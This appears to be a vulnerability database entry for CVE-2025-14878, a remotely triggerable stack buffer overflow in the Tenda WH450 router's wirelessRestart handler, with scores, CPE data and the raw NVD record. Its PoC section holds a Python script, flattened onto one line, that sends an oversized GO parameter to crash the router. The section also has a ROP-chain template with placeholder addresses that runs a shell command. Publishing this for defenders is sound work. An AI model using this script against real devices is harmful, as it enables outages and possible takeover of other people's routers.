Security Vulnerability Report
中文
CVE-2025-14878 CVSS 9.8 CRITICAL

CVE-2025-14878

Published: 2025-12-18 16:15:53
Last Modified: 2026-02-24 06:16:27
Source: [email protected]

Description

A security flaw has been discovered in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/wirelessRestart of the component HTTP Request Handler. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:wh450_firmware:1.0.0.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:wh450:-:*:*:*:*:*:*:* - NOT VULNERABLE
Tenda WH450 < 1.0.0.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14878 PoC - Tenda WH450 /goform/wirelessRestart Buffer Overflow # Target: Tenda WH450 Router (Firmware 1.0.0.18) def exploit_buffer_overflow(target_ip, target_port=80): """ Exploit for CVE-2025-14878 - Stack-based buffer overflow in /goform/wirelessRestart Args: target_ip: Target router IP address target_port: HTTP service port (default: 80) Returns: bool: True if exploit sent successfully """ target_url = f"http://{target_ip}:{target_port}/goform/wirelessRestart" # Create overflow payload - 500 bytes to trigger buffer overflow # This will overwrite stack memory including return address payload = "A" * 500 # Prepare POST data with GO parameter containing overflow payload data = { "GO": payload } try: print(f"[*] Sending exploit payload to {target_url}") print(f"[*] Payload length: {len(payload)} bytes") # Send malicious request response = requests.post(target_url, data=data, timeout=5) print(f"[+] Exploit request sent successfully") print(f"[*] Response status: {response.status_code}") return True except requests.exceptions.Timeout: print("[+] Target may be vulnerable - connection timeout (possible crash)") return True except requests.exceptions.ConnectionError: print("[+] Target may be vulnerable - connection refused (possible crash)") return True except Exception as e: print(f"[-] Error: {str(e)}") return False def create_rop_payload(): """ Generate ROP chain payload for code execution This is a template - actual ROP gadgets depend on firmware version """ # ROP gadgets for Tenda WH450 1.0.0.18 rop_chain = "" # Stack pivot gadget address rop_chain += "\xaa\xbb\xcc\xdd" # Stack pivot # Pop gadgets to setup registers rop_chain += "\x11\x22\x33\x44" # Pop gadget address rop_chain += "\xee\xff\x00\x00" # Value for $t9 # System function address rop_chain += "\x55\x66\x77\x88" # system() address # Return address rop_chain += "\x99\xaa\xbb\xcc" # Next gadget or nop slide # Command string rop_chain += "/bin/sh -c whoami\x00" # Pad to 500 bytes rop_chain = rop_chain.ljust(500, "\x90") return rop_chain if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-14878.py <target_ip> [port]") print("Example: python cve-2025-14878.py 192.168.0.1 80") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 print("=" * 60) print("CVE-2025-14878 - Tenda WH450 Buffer Overflow Exploit") print("=" * 60) exploit_buffer_overflow(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14878", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:52.960", "lastModified": "2026-02-24T06:16:27.343", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/wirelessRestart of the component HTTP Request Handler. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "baseScore": 10.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:wh450_firmware:1.0.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "D139CB33-CD57-41A7-93EF-E84B1F6D2814"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:wh450:-:*:*:*:*:*:*:*", "matchCriteriaId": "395B4439-4840-4353-B963-B82AC569E265"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/wirelessRestart/wirelessRestart.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337369", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337369", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715357", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.